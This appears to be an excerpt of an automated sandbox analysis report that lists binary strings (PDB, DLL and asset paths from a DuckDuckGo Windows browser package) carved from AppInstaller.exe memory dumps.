Source: Binary string: /WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdbPDB/WindowsBrowser/WindowsBrowser.UserPreferences.pdbBL/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.dllon source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.WebView.pdb/WindowsBrowser/Themes/Dark.xaml/IMAGES/WIDE310X150LOGO.SCALE-400.PNG/WindowsBrowser/Themes/Light.xaml source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.XML/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.PDB/WINDOWSBROWSER/PROTOBUF-NET.GRPC.ASPNETCORE.DLLdllL/WindowsBrowser/protobuf-net.Grpc.AspNetCore.dlldlll source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: T/WindowsBrowser/WindowsBrowser.Burning.pdb/WindowsBrowser/WindowsBrowser.Privacy.dlllll source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Bookmarks.pdbpdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: o.pdb source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034989049.0000019EC9981000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Common.Wpf.pdb/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PDB/WindowsBrowser/WindowsBrowser.Bookmarks.pdbDB/WindowsBrowser/WindowsBrowser.Autocomplete.pdbPm source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: J/WindowsBrowser/Xiejiang.SKLottie.dll/WindowsBrowser/WindowsBrowser.Common.Wpf.pdbl source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC9258000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N/WindowsBrowser/DuckDuckGo.VPN.Tray.pdbR/WindowsBrowser/Microsoft.Data.Sqlite.dll/WindowsBrowser/WPFLocalizeExtension.dllll source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Burning.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TE.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: owser.CrashReporting.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PUBLIC.PDB.pdb/WindowsBrowser/DuckDuckGo.CrashReporter.runtimeconfig.jsonDB/WINDOWSBROWSER/WEBVIEW2/EXTENSIONS/EXTERNAL_EXTENSIONS.JSONTA/IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-48.PNG.png source: AppInstaller.exe, 00000008.00000002.3034817725.0000019EC991D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.VPN.Tray.pdb@Q source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: db/WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Updater.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ed.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.PDB/WindowsBrowser/DuckDuckGo.Updater.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.SecureStorage.pdb source: AppInstaller.exe, 00000008.00000002.3033983146.0000019EC9789000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdb/WindowsBrowser/WindowsBrowser.SecureStorage.dllb source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: X/WindowsBrowser/DuckDuckGo.CrashReporter.pdbb/WindowsBrowser/tr/PresentationCore.resources.dll/WindowsBrowser/WindowsBrowser.SecureStorage.dll source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.NetworkProtection.pdb/WINDOWSBROWSER/WINDOWSBROWSER.CRASHREPORTING.PDB/WindowsBrowser/WindowsBrowser.UserPreferences.pdbbB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: w2.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.pdbb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.WebView2.pdbImages/Wide310x150Logo.scale-150.pngWindowsBrowser/WindowsBrowser.Common.pdb2.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DB/WINDOWSBROWSER/WINDOWSBROWSER.STYLES.PDBP source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Bookmarks.pdb/WINDOWSBROWSER/WINDOWSBROWSER.BOOKMARKS.PDB/WindowsBrowser/WindowsBrowser.Bookmarks.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.BOOKMARKS.PDBdb/IMAGES/SQUARE44X44LOGO.TARGETSIZE-32.PNG.dll/WindowsBrowser/WebView2/eventlog_provider.dll/IMAGES/SQUARE44X44LOGO.TARGETSIZE-256.PNG.sig/WindowsBrowser/WindowsBrowser.Common.pdb2.pdb/Images/Square44x44Logo.targetsize-256.png/Images/Square44x44Logo.targetsize-24.pnge/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.WPF.PDBb source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.BURNING.PDB/WindowsBrowser/DuckDuckGo.CrashReporter.pdbdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PUBLIC.PDB/WindowsBrowser/System.DirectoryServices.AccountManagement.dll source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashReporting.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DB/WindowsBrowser/WindowsBrowser.CrashHandler.pdb/WindowsBrowser/DuckDuckGo.CrashReporter.pdb/WindowsBrowser/WindowsBrowser.CrashHandler.pdb/WINDOWSBROWSER/WINDOWSBROWSER.BURNING.PDB/WINDOWSBROWSER/WINDOWSBROWSER.CRASHHANDLER.PDB/WindowsBrowser/WindowsBrowser.CrashHandler.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/SYSTEM.DIRECTORYSERVICES.ACCOUNTMANAGEMENT.DLL/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb/WINDOWSBROWSER/SYSTEM.SECURITY.CRYPTOGRAPHY.ENCODING.DLLles/Images/Square44x44Logo.targetsize-24_altform-unplated.png/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.RUNTIMECONFIG.JSONdb/WINDOWSBROWSER/GRPC.ASPNETCORE.SERVER.CLIENTFACTORY.DLLON/IMAGES/SQUARE44X44LOGO.TARGETSIZE-24_ALTFORM-UNPLATED.PNG/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.RUNTIMECONFIG.JSONdb/WindowsBrowser/Grpc.AspNetCore.Server.ClientFactory.dllON/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.SHARED.PDB/WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb.PDB/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PUBLIC.PDB/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.SHARED.PDB/WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb.PDB/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.SHARED.PDB/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PUBLIC.PDB/WindowsBrowser/DuckDuckGo.CrashReporter.runtimeconfig.jsonDB/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.deps.jsonON/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.DEPS.JSON source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.WebView2.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: `/WindowsBrowser/Microsoft.Win32.SystemEvents.dll\/WindowsBrowser/Microsoft.WSMan.Management.dll^/WindowsBrowser/WindowsBrowser.CrashHandler.pdb`/WindowsBrowser/Microsoft.AspNetCore.Routing.dllb/WindowsBrowser/ja/PresentationCore.resources.dll/WindowsBrowser/WindowsBrowser.Sync.Crypto.Managed.dll source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Burning.pdb.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d/WindowsBrowser/WebView2/delegatedWebFeatures.sccdZ/WindowsBrowser/Nito.AsyncEx.Coordination.dlld/WindowsBrowser/PresentationFramework.AeroLite.dll\/WindowsBrowser/Polly.Contrib.WaitAndRetry.dllf/WindowsBrowser/PresentationFramework-SystemXml.dlld/WindowsBrowser/WindowsBrowser.UserPreferences.pdb^/WindowsBrowser/PresentationFramework.Aero2.dll/WindowsBrowser/WindowsBrowser.UserPreferences.dllg source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.WebView.WebView2.dll/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.DEPS.JSON/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.EXE/WINDOWSBROWSER/GRPC.ASPNETCORE.SERVER.DLL.dll/WINDOWSBROWSER/MESSAGEPACK.ANNOTATIONS.DLLDLL/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.DLL/WindowsBrowser/DuckDuckGo.runtimeconfig.json/WindowsBrowser/WindowsBrowser.Burning.pdb/WINDOWSBROWSER/GRPC.NET.CLIENTFACTORY.DLL.dll/WINDOWSBROWSER/MICROSOFT.BCL.TIMEPROVIDER.DLL source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: iew2.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: r.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.NetworkProtection.pdbsononP source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.SecureStorage.pdbWindowsBrowser/DuckDuckGo.Updater.pdbpdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.CRASHHANDLER.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.NetworkProtection.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.VPN.Tray.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Autocomplete.pdb/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.WPF.PDB/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.WPF.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.COMMON.WPF.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R/WindowsBrowser/WindowsBrowser.Styles.pdbR/WindowsBrowser/WindowsBrowser.Common.pdbP/WindowsBrowser/System.Text.Encoding.dllV/WindowsBrowser/System.ServiceModel.Web.dllV/WindowsBrowser/WebView2/learning_tools.dllN/WindowsBrowser/WebView2/Locales/sr.pakN/WindowsBrowser/WebView2/Locales/ta.pak/WindowsBrowser/Typography.GlyphLayout.dll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC9258000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/Vanara.PInvoke.Cryptography.dllL/WindowsBrowser/WebView2/concrt140.dllL/WindowsBrowser/DuckDuckGo.Windows.pdbin source: AppInstaller.exe, 00000008.00000002.3031199453.0000019EC92D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.PDB/WindowsBrowser/DuckDuckGo.Updater.pdbWindowsBrowser/DuckDuckGo.PersonalInfoRemoval.runtimeconfig.jsonS.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Burning.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.UPDATER.RUNTIMECONFIG.JSON/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.dll/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PDB/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.RUNTIMECONFIG.JSON/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.RUNTIMECONFIG.JSON/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.exeon source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdbWindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-16.PNG.png/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb/IMAGES/SQUARE44X44LOGO.ALTFORM-LIGHTUNPLATED_TARGETSIZE-16.PNG/Images/Square44x44Logo.altform-unplated_targetsize-256.png/IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-256.PNG/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.DEPS.JSONonDB/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.DEPS.JSON/WindowsBrowser/Grpc.AspNetCore.Server.ClientFactory.dllD.PDB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: j/WindowsBrowser/System.Security.Cryptography.Pkcs.dlln/WindowsBrowser/Microsoft.AspNetCore.SignalR.Common.dlll/WindowsBrowser/ja/PresentationFramework.resources.dllh/WindowsBrowser/Microsoft.AspNetCore.HttpLogging.dlll/WindowsBrowser/de/PresentationFramework.resources.dllj/WindowsBrowser/Microsoft.AspNetCore.WebUtilities.dllh/WindowsBrowser/System.Security.Cryptography.Xml.dllt/WindowsBrowser/System.Runtime.CompilerServices.Unsafe.dllp/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.deps.jsonp/WindowsBrowser/fr/WindowsFormsIntegration.resources.dlll/WindowsBrowser/ko/PresentationFramework.resources.dlll/WindowsBrowser/Microsoft.Extensions.Identity.Core.dlll/WindowsBrowser/cs/PresentationFramework.resources.dlll/WindowsBrowser/ru/PresentationFramework.resources.dllh/WindowsBrowser/WindowsBrowser.NetworkProtection.pdb source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.COMMON.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Styles.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb/WINDOWSBROWSER/WINDOWSBROWSER.CRASHREPORTING.PDBN.PDB/WINDOWSBROWSER/WINDOWSBROWSER.CRASHREPORTING.PDB/WindowsBrowser/WindowsBrowser.Autocomplete.Public.xml/WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.XML source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @/WindowsBrowser/Images/EDark.png</WindowsBrowser/DuckDuckGo.pdb/d5c04536-5379-4709-8d19-d13fdd456ff6/0.90.3.0/DuckDuckGo_0.90.3.0.msixbundle source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
